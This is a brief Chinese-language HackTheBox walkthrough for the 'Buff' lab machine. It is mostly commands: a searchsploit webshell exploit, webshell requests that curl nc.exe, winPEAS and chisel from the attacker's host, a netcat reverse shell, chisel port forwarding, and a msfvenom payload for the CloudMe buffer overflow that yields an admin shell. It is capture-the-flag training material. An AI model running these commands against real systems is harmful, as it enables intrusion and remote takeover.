Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.


HackTheBox >_ Buff_198

Buff_198

$ searchsploit -m 48506

python 48506.py http://10.10.10.198:8080/

注意这个利用脚本只相当于激活一个webshell

只能上传文件,只能执行有限的命令

搜索后知道这个webshell的地址为

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=

利用curl将nc传输到靶机

python -m SimpleHTTPServer 8080

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl http://10.10.14.5:8080/nc.exe --output nc.exe

使用nc 得到shell

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=nc.exe 10.10.14.5 4444 -e cmd.exe

提权

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl http://10.10.14.5:8080/winPEAS.exe --output winPEAS.exe

经过一些查找,在shaun用户的downloads文件夹下发现了可疑的文件

应该是cloudme 1.11.2

这个程序是有存在bof漏洞的。

查看进程,看是否有运行

tasklist

searchsploit -m 48389

查看脚本

脚本目标默认目标是本地127.0.0.1:8888

搜索了一下,cloudme是在本地监听的,

在枚举的时候也发现了同样的信息

上传chisel进行端口转发

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl http://10.10.14.5:8080/chisel.exe --output chisel.exe

./chisel.exe client 10.10.14.5:8181 R:8888:127.0.0.1:8888

kali 端

现在已经成功转发端口。

按照脚本中的例子生成payload

msfvenom -p windows/exec CMD=’C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.5 1337’ -b ‘\x00\x0a\x0d’ -f py -v payload

替换掉脚本中的payload部分

nc监听1337

执行exploit,立即获得root shell